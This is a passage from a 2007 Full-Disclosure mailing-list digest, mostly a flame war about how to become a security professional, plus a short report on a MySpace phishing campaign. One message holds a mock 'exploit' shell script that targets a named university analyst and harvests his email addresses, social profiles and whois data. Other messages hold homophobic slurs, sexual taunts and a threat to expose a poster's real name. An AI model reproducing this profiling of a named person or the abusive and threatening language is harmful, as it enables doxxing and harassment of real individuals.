most important rule to becoming a good security professional is have balls, if you think something is wrong,don't beaffraid to speak up, even if it means losing your job. Remember,
thesecurity of other people comes before the security of your job position. So if you think something is wrong, tell people aboutit,and if they don't listen, then keep repeating it over and over.Nevergive in and keep on trying to tell people about something youbelievein. You are a slave to the security of others, you don't comefirst"they" do.So what's wrong buddy?Ninth most important rule to becoming a good securityprofessional.Don't read public mailing lists, don't read security news sites,
anddon't read web logs about what other people think aboutsecurity. Theyall suck, don't trust anyone in this world and don't believe the
hype.99.9% of anything post in public is attention grabbing bullshit,
youdon't need it. Concentrate with whats going on within your owncompanyand screw all the others. Only read these mediums if its related
towhat you're doing that day at work to fix a bug or thrawt asecurityincident. Don't read about what could happen, stick to withwhatsactually happening to you that day. Not what other people say is
goingto happen next week. Tenth most important rule to becoming a security professional,knowyour enemy. Yes, get to know them, eavesdrop on them, send themgiftsand make them feel special. Your enemy is the single mostimportantperson to you and your company's assets. If you don't know whatyourenemy is doing then you don't have security. Remember though,don'tconcetrate on other peoples enemies, concentrate on enemies foryourcompany. Don't read websites that say they are your enemy,because itsunlikely they really are. Your real enemies don't announcethemselvesoften and are unlikely to make public announcements about it,and theones that do are usually hoaxes.Fuck, I couldn't read it all.. I got exhauzted rchrafe.wordpress.com ------------------------------ Message: 13 Date: Tue, 20 Nov 2007 07:46:58 +0100 From: rchrafe <rchrafe () gmail com> Subject: Re: [Full-disclosure] How to become a Computer Security Professional ? To: Richard Golodner <rgolodner () infratection com> Cc: full-disclosure () lists grok org uk Message-ID: <474282E2.50009 () gmail com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Richard Golodner wrote:Get a good job where you can find best security practices being
usedand learn from others who have been in the field. You willdevelop your ownset of tools and ideas, but the concepts are almost always thesame. Defensein depth is a good idea and it works. 11th most important rule. Never ever take advice that has tenrulesabout something they know nothing about. N3TD3V, please go away. Come back under a different alias ifyoumust but please STFU! The guy wanted a serious answer and you broke many of your own rules. Don't get your kilt all bunched up, just be serious foronce in yournet-sec career. Richard Golodner Infratection IT Services _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/You're so gay dude ------------------------------ Message: 14 Date: Tue, 20 Nov 2007 07:49:20 +0100 From: rchrafe <rchrafe () gmail com> Subject: Re: [Full-disclosure] How to become a Computer Security Professional ? To: XSS Worm XSS Security Information Portal <cross-site-scripting-security () xssworm com> Cc: full-disclosure () lists grok org uk Message-ID: <47428370.6050500 () gmail com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed XSS Worm XSS Security Information Portal wrote:#!/bin/sh # 0day exploit for Paul Schmehl # based on information provided by Paul Schmehl # pauls () utdallas edu <mailto:pauls () utdallas edu> # echo pauls > /hack/edu/utdallas.edu/known.addresses googledump.pl --email-addresses --context-links --referers --extended-links -keywords"Paul","Schmehl","utdallas.edu<http://utdallas.edu>", "pauls@", "pauls@utdallas ","paul.schmehl@" --verbose socialgrab.pl --known-address "pauls () utdallas edu <mailto:pauls () utdallas edu>" --real-name "Paul Schmehl" --tags=security,hacking,utdallas,vulnerability --search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,dig
g,bebo,ebay,blogger,wordpress--verbose --dump-links infopull.pl --pgp-search --whois --domaintools --usenet --trackers--irclog --mirrors --listserv --known-addresses="pauls () utdallas edu<mailto:pauls () utdallas edu>" echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu # http://xssworm.comHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAH
AHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHA
HAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAOn 11/19/07, *Paul Schmehl* <pauls () utdallas edu <mailto:pauls () utdallas edu>> wrote: --On November 19, 2007 3:34:23 AM +0000 worried security <worriedsecurity () googlemail com <mailto:worriedsecurity () googlemail com>> wrote: > > The forth most important rule to becoming a securityprofessional,> always use a throw-away e-mail account so it doesn'tmatter ofscript > kids hi-jack your e-mail account with the next cross-sitescripting> vulnerablity that gets posted to the public mailing lists. > You forgot the most important rule of all. Pay no heed tobozoswho post anonymously and don't even have a job in security. Theiradvice isusually worth just as much as their reputation. Paul Schmehl ( pauls () utdallas edu<mailto:pauls () utdallas edu>)Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ <http://www.utdallas.edu/ir/security/> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/ -- Francesco Vaj [CISSP - GIAC] CSS Security Researcher mailto: vaj () nospam xssworm com <mailto:vaj () nospam xssworm com> aim: XSS Cross Site ------ XSS Cross Site Scripting Attacks Web 2.0 Application Security Information Blog (tm) 2007 http://www.XSSworm.com/ ------ "Vaj, bella vaj.------------------------------ Message: 15 Date: Mon, 19 Nov 2007 20:52:30 -0800 From: "Dancho Danchev" <dancho.danchev () gmail com> Subject: [Full-disclosure] Large Scale MySpace Phishing Attack To: full-disclosure () lists grok org uk Message-ID: <b787ce30711192052k34755398t7a9c2c3c1c98418 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 In need of a "creative phishing campaign of the year"? Try this, perhaps the largest phishing attack spoofing MySpace and collecting all the login details at a central location, that's been active for over a month, and continues to be. A Chinese phishing group has come up with legitimate looking MySpace profiles (profile.myspace.com) in the form of subdomains at their original .cn domains, and by doing
so achieve its ultimate objective - establish trust through typosquatting, remain beneath the security vendors radar by comment spamming the URLs inside MySpace, and obtain the login details of everyone who got tricked. Complete assessment in the form of domains and URLs participating,
as well as the message used per domain for the internal comment spam campaign, is available here : http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing- attack.html Regards, Dancho ------------------------------ Message: 16 Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00) From: Elazar Broad <elazarb () earthlink net> Subject: Re: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk> Message-ID: <22163281.1195532704914.JavaMail.root@elwamui- rubis.atl.sa.earthlink.net> Content-Type: text/plain; charset=UTF-8 I did not see this: http://www.milw0rm.com/exploits/4251, my apologies, please ignore my last post... ------------------------------ Message: 17 Date: Tue, 20 Nov 2007 08:34:58 +0100 From: rchrafe <rchrafe () gmail com> Subject: Re: [Full-disclosure] so gay huh? To: Richard Golodner <rgolodner () infratection com>, full-disclosure () lists grok org uk Message-ID: <47428E22.5060807 () gmail com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Richard Golodner wrote:Please come and introduce yourself to me at any Info-Secconferenceor convention so we can meet face to face. We will see what isup then.Richard GolodnerMr Golodner, I'm currently unaware as to why you want us to come and
meet you at an info-sec conference, or convention, things like defcon and HOPE
are for the utterly pathetic. We don't know what to say, you're too funny to take seriously. Never email us again, you piece of garbage. rcbrafe ------------------------------ Message: 18 Date: Tue, 20 Nov 2007 08:57:18 +0100 From: rchrafe <rchrafe () gmail com> Subject: Re: [Full-disclosure] so gay huh? To: Richard Golodner <rgolodner () infratection com>, full-disclosure () lists grok org uk Message-ID: <4742935E.4060008 () gmail com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Richard Golodner wrote:You think those are professional conferences? Those are script children parties for retards that can't get laid.LOL -- Like my, RCHRAFE didn't know this.Come to a Homeland Security meetingOur affiliates are members of several.or a National Security briefing.What about CTU ?You can't even hide your own identity properly... You know who we are? SHIT We're going to die a sudden death!I did not say I wanted to meet you.That's too bad, I'm horny f0r y0uWhat I am saying is that if you are so tough, step and be a man./me stepz up & becomez 4 m4nAt least use your real name or I will begin to publicize it for you if you would like.Firstly: Richard Golodner i love pissing you off, it gets me off. Secondly: Your post previously sometime ago made me cum all over my k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003- 08/msg00019.html You probably don't know the difference between IGRP and EIGRP routing protocolz What a loser, haha. ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 33, Issue 38 ***********************************************
-- Click to begin your health care training online. Request info today. http://tagline.hushmail.com/fc/Ioyw6h4fOHYjfAEobiMPrx3XchsUpwoPDFF8YRhkb8de1zUc0aerIM/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- unsubscribe LT (Nov 26)